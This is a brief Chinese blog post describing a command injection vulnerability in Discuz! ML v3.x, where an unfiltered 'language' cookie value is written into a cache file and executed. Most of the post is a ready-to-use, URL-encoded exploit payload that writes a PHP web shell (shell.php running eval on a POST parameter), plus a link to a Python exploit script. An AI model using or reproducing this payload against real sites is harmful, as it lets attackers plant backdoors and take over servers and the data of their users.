discuz mlv3.x命令注入

　　　　本次漏洞是由于Discuz! ML对于cookie字段的不恰当处理造成的cookie字段中的language参数未经过滤，直接被拼接希尔缓存文件中，而缓存文件随后被加载，造成代码执行。

共有60出利用点，下面前台index.php代码执行：

漏洞利用exp：

%27.file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522mo%2522%255d%29%253b%253f%253e%27%29%29.%27

python代码：

https://github.com/AdministratorGithub/Discuz-ML-v.3.4-exp

posted @ 2019-07-15 21:00 Junsec 阅读(808) 评论(0) 编辑收藏举报

刷新页面返回顶部

Junsec

discuz mlv3.x命令注入

公告